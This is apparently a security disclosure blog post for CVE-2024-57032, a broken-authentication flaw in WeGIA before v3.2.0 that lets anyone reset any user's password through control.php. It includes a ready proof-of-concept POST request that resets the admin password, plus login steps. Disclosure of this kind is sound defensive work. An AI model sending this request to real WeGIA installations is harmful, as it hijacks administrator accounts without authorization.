Featured image of post CVE-2024-57032

CVE-2024-57032

Broken Authentication

CVE-2024-57032: Broken Authentication - Old Password

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2024-57032

Vendor

WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions.

https://www.wegia.org

https://sol.sbc.org.br/index.php/latinoware/article/view/31544

Affected Product Code Base

WeGIA < v3.2.0

Vulnerability Description

A security vulnerability was identified in the web application WeGIA, where it is possible to change a user's password without verifying the old password. This issue exists in the control.php endpoint and allows unauthorized attackers to bypass authentication and authorization mechanisms to reset the password of any user, including admin accounts.

POC

Vulnerable Endpoint: POST /WeGIA/controle/control.php

HTTP Request Example:

1
2
3
4
5
6
POST /WeGIA/controle/control.php HTTP/1.1
Host: comfirewall.wegia.org:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 149

senha_antiga=A&nova_senha=wegia&confirmar_senha=wegia&nomeClasse=FuncionarioControle&metodo=alterarSenha&redir=logout.php&id_pessoa=1&alterar=Alterar

Observations:

Missing Password Validation: The senha_antiga parameter is not validated, allowing the password to be reset without verifying the user's existing password.

Change the default password wegiafrom admin user and use a random value in the field senha_antiga:

Login with the new password:

References

https://github.com/nilsonLazarin/WeGIA/issues/814

https://www.wegia.org

https://github.com/LabRedesCefetRJ/WeGIA/

Discoverer

Natan Maia Morette

By: CVE-Hunters

Built with Hugo
Theme Stack designed by Jimmy